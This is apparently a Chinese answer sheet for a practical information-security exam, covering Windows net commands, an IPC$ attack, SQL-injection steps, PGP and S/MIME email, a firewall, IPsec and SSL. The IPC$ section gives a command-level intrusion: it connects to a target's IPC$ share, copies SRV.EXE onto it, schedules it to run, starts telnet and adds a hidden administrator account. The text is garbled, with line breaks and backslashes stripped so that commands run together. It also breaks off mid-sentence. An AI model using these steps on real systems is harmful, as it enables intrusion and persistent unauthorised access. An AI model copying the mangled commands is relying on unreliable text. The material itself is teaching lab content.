信息安全技术与实施-实操考试是题答案

网络安全技术实验net share zzz=d:zzz 共享d:zzz 共享名为zzznet use ipzzz 123 /user:zero用户zero密码123连接共享copy ipzzzxxx.xxx C:xxx.xxx从共享复制xxx.xxx到C:xxx.xxx添加管理员用户net user zero 123 /add 添加zero用户 密码为123net localgroup administrators zero /add添加zero到administrators用户组ftp open ?.?.?.?用户名 密码put x:xxx.xxx 上传get xxx.xxx x:xxx.xxx 下载bye 退出-IPC$攻击net use ipipc$ /user: copy C:Server.exe ipipc$计划任务net time ip 查看ip当前时间at ip time Server.exetelnet ip添加管理员用户如上题一.熟悉常见的系统命令在命令行下完成以下命令的功能使用：Net share（创建共享文件夹）C:md 56C:net share 56=c:5656 共享成功。Net use（访问并复制共享文件夹中的内容到本地计算机）net use ipzzz 123 /user:zero用户zero密码123连接共享copy ipzzzxxx.xxx C:xxx.xxx从共享复制xxx.xxx到C:xxx.xxxNet user（创建用户账号、并将用户添加到管理员组）ftp（完成FTP的上传、下载）(一) IPC$攻击利用IPC$漏洞对未打补丁的Windows计算机实施攻击主要步骤：1. 扫描IPC$计算机2. 将Server.exe程序上传到目标机器E:实验工具IPC$攻击工具net use 1ipc$E:实验工具IPC$攻击工具copy E:实验工具IPC$攻击工具SRV.EXE 1e$SRV.EXE3. 为目标计算机指定计划任务E:实验工具IPC$攻击工具at 1 19:33 srv.exe4. 用Telnet命令连接sc 1 start tlntsvrtelnet 15. 添加管理员账号E:net user lijietian sotian /addE:net localgroup administrators lijietian /add(二) SQL注入漏洞提权1. 将嘉枫文章管理系统发布到IIS上2. 用domain4.1进行旁注检测3. 猜解表名4. 猜解列名5. 破解用户名、密码6. 管理入口扫描7. 用得到的管理员账号登录(三) 电子邮件安全（PGP）用PGP实现电子邮件的加密/签名和解密/校验1. 配置Outlook Express可正确收发邮件2. 产生密钥对3. 导入对方公钥4. 签名并信任对方公钥5. 成功发送加密邮件，成功解密密文6. 成功发送签名邮件，正确验证签名7. 成功发送加密并签名邮件，正确解密校验邮件(四) 电子邮件安全（S-MIME）用Outlook Express自带的安全功能实现电子邮件的加密/签名和解密/校验1. 配置Outlook Express可正确收发邮2. 下载安装CA证书3. 申请并下载安装电子邮件安全证书4. 获得对方的数字标识5. 成功发送加密邮件，成功解密密文6. 成功发送签名邮件，正确验证签名7. 成功发送加密并签名邮件，正确解密校验邮件(五) 防火墙ISA Server 2004通过配置防火墙策略实现如下内容1. 在ISA主机上安装IIS，并配置Web服务，网站首页为自己的姓名和学号；2. 配置防火墙策略允许另一台计算机可以访问Web页面；3. 在另一台非ISA主机上安装配置POP3服务，并配置邮件服务；4. 配置防火墙策略允许ISA主机访问邮件服务。 正确安装IIS，并配置Web服务，首页正确 防火墙策略：允许访问web服务，验证正确 正确安装POP3服务，并建立域和邮箱，能提供邮件服务 防火墙策略：允许ISA主机访问邮件服务，可收发邮件(六) IP安全策略实现两台计算机之间所有IP通信的安全传输（要求使用证书进行身份验证）1. 下载并安装CA证书，使之成为受信任的根证书颁发机构；2. 分别为两台主机申请并安装客户端身份证书；3. 配置IP安全策略（要求安全通信），要求仅在特定的两台主机之间实现IP安全通信4.5. 能够完成IP安全通信，并验证。（可使用网络监视器或IPSec监视器捕获查看）SSL用SSL实现Web服务器和客户端（浏览器）之间的安全通信（要求客户端证书）。1. 在IIS的Web服务器中，生成证书申请文件；2. 为IIS的Web服务器申请证书；3. 下载并安装该证书；4. 配置Web服务器，申请SSL安全通道，并要求客户端证书；5. 为客户机的浏览器申请浏览器证书并